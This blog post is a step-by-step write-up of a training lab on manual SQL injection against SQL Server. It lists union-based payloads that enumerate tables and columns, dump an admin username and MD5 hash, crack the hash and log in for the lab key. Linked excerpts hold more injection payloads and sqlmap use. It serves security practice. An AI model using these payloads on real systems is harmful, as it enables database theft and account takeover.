墨者学院;SQL手工注入;在线靶场;SQLsever;

最新推荐文章于 2025-10-13 15:46:17 发布
原创 最新推荐文章于 2025-10-13 15:46:17 发布 · 1.5k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #jvm #servlet

本文详细讲述了如何通过SQL注入技巧逐步获取数据库管理权限,包括权限级别理解、注入验证、字段判断、数据泄露与爆表操作,最终实现对admin_mz账户的登录。

1、启动靶场环境;

一颗墨币启靶场;

 

 

点击右下角; 

2、SQLServer有三个权限级别:

sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限

db权限:⽂件管理,数据库操作等权限 users-administrators

public权限:数据库操作 guest-users 

使用'           

报错,有注入点;

3、输入and 1=1 正常

and 1=2 报错--->数字型注入实锤了;

 4、判断出字段为4个字段;等于实际字段数不报错,大于或小于实际字段数会报错

order by 5

 

order by 4

order by 3 

 

 5、判断回显字段,这里使用联合查询union;记得在sql sever中要加all,占位符使用null;

union all select null,null,null,null

这里将前面id=2修改为id=-2;回显2时加上'',便可以回显成功了; 

?id=-2 union all select null,'2',null,null

 ?id=-2 union all select null,'2','3',null

6、这里尝试一下用带引号的字符串占位,看一下会不会报错;

发现并没有报错;

 

  ?id=2 union all select '1','2','3','4'

加上"-"试一下; 

?id=-2 union all select '1','2','3','4'

也可以回显,之前练习出了些许问题;

有可能是SQLserver里面对中文输入法下的“=”,和“-”会识别错误;

中文空格和英文空格会导致url编码不一致,导致查询错误;

UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型;

7、查看数据库版本;数据库名字; 

?id=-2 union all select '1',(select @@version),(select db_name()),'4'

 

8、查数据库主机名;数据库拥有者;

 ?id=-2 union all select '1',(select host_name()),(select user),'4'

dbo是数据库默认用户,具有所有者权限;

 9、有安装⾃带的数据表sysobjects和syscolumns等

sysobjects:记录了数据库中所有表,常⽤字段为id、name和xtype。

syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。

id为标识,name为对应的表名和字段名,xtype为所对应的对象类型

 10、爆表;manage;

top n #查询前n条记录;

limit 2,3 #查询第2条开始的3条数据;

查询dbo.sysobjects表中⽤户创建的表,获取其对应的id和name

dbo.sysobjects 系统⾃带库 xtype='U' 是指⽤户创建的表

?id=-2 union all select '1',(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U'),'3','4'

获取manage对应id;

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U'

找到第二张表和其对应id;

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U' and id <> 5575058

 

没有第三张表了;

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U' and id <> 5575058 and id <> 101575400

 

11、爆字段

object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的

col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果.

?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects), '3' ,4

 

 

?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4

 ?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4

 

 12、爆数据 

?id=-2 union all select top 1 null,username,password,null from manage

admin_mz

72e1bfc3f01b7583 


 

 

 ?id=-2 union all select top 2 null,username,password,null from manage

 

只有一条.......... 

13、md5在线解密;

97285101

 14、登陆去了..........

admin_mz 

97285101

 

 

 

恭喜你 admin_mz 成功登录用户管理后台,KEY: mozhe503bb739fd11b93e4112e89edbb

15、提交key

 

 

小乘杭
关注
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2836
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
SQL注入靶场
yesdmmf的博客
05-11 253
Less-01 Less-02 同第一题一样,只是在id传参出少了单引号 Less-03 闭合方式换成了‘)的形式 Less-04 更换闭合方式 Less-05 因为会显示数据库报错,可尝试报错注入 1、通过floor报错 and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from inform...
常见的Sql注入利用及sqlmap的简单使用(均在靶场内实现)
最新发布
2302_81234358的博客
10-13 1077
本文系统梳理了SQL注入技术,包括以下核心内容:1. 注入基础知识:URL编码规则(%23代替#、%20代替空格等)、进制标识方法;2. 常见注入点:URL参数、表单输入、Cookie、HTTP头部字段等;3. 主要注入方法:联合查询(union)、布尔盲注(length/substr/ascii)、时间盲注(if/sleep)、报错注入(updatexml/extractvalue)、宽字节注入、DNSLOG注入;4. 完整注入流程:判断注入点→闭合方式→字段数→回显位→获取库/表/列信息→提取数据;5.
SQL注入--靶场练习
wmr123456001的博客
02-11 2351
SQL注入靶场练习
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 2064
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
零基础学习手工SQL注入
weixin_34110749的博客
06-07 402
SQL注入介绍SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规定:限制每人每次只能带一把开自己保险柜的钥匙...
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 576
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1652
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1币(注册的时候会送十几个币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者学院(4个sql靶场攻略)
2201_75891821的博客
07-22 2025
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
墨者学院SQL手动注入 靶场初体验
bianxia123456的博客
04-06 5046
step1: 判断注入 判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。 step2: 猜解列名数量 order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。 order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。 order by 默认升序,降序关键字DESC,即order by 字段名 DESC; 所以使用order by关键字就能够知道整个表一共有多少个列。 ...
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
2303_81096390的博客
08-02 695
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入,两者有什么区别呢,简单来说就是字符型注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
墨者学院sql手工注入;access;在线靶场
xiaochenhang的博客
08-20 927
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
墨者学院在线靶场SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 802
墨者学院在线靶场SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
sql注入靶场
weixin_45095113的博客
11-27 799
SQL注入靶场
墨者学院SQL手工注入
qq_52074678的博客
12-11 542
相关知识 在MYSQL5.0以上版本,mysql存在一个自带的数据库,名为information_schema,它是一个存储记录有所有数据 库名,表名,列名的数据库,也相当于可以通过查询它获取一个数据库下面的表名或列名信息 table_name 表名 column_name 列名 table_schema 数据库名 information_schema.table 记录所有表名的表 information_schema.column 记录所有列名的表 info...
靶场——SQL注入
newqian的博客
08-06 2264
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(其原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)
weixin_42079912的博客
07-18 965
背景介绍 一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。 实训目标 1、掌握SQL注入原理; 2、了解MySQL的数据结构; 3、了解布尔盲注相关语句; 解题方法: 运用sqlmap工具对数据库进行爆破 1.判断注入点存在:python sqlmap.py -u “ip” 2.判断数据库名称:python sqlma...
墨者学院-在线靶场
weixin_42730900的博客
02-23 4317
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
DVWA在线靶场-SQL注入部分
weixin_48878440的博客
05-12 742
DVWA-sql注入部分 dvwa联合注入盲注
墨者学院sql手工注入
03-03
### 关于SQL手工注入的学习 #### SQL手工注入简介 SQL注入是一种常见的Web应用程序攻击方式,通过向查询参数输入恶意的SQL语句片段,从而改变原有SQL命令的行为。这种技术能够绕过身份验证机制、读取敏感数据甚至控制服务器。 #### 靶场环境介绍 墨者学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而不必担心额外开销。 #### 实践案例分析 对于想要深入了解如何实施SQL注入的人来说,在实际操作之前先观察目标网站是否存在潜在可利用之处非常重要。比如查看URL中的GET请求参数是否未经充分过滤就被直接拼接到后台执行的SQL指令里;又或者是POST表单提交的数据项有没有被妥善处理等情形都可能是突破口所在[^1]。 当确认存在风险点之后,则可以根据具体场景采取不同策略展开进一步探索: - **字符型字段**:如果发现某个文本框允许接收任意字符串作为输入值的话,那么就可以试着构造一些特殊模式串去试探内部逻辑反应情况。例如`' OR '1'='1`这样的表达式往往能帮助判断出是否有漏洞存在以及其大致位置范围[^3]。 - **联合查询(UNION SELECT)**:这是一种较为高级但也非常实用的方法之一。它可以让攻击者将自己的SELECT子句附加到原始查询后面并获取更多有用的信息。像下面这条语句就是用来枚举当前库内所有表格名称及其所属数据库名的一个例子: ```sql new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() ``` 请注意上述做法仅供合法授权下的渗透测试培训用途,请勿非法入侵任何网络设施! #### 安全建议 为了防止遭受此类威胁影响业务正常运转,开发者应当遵循最佳编码实践指南,如采用预编译语句代替动态组装SQL文法结构;严格校验前端传来的一切外部可控变量合法性;定期审查源码质量排除隐患等等措施加强防护力度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值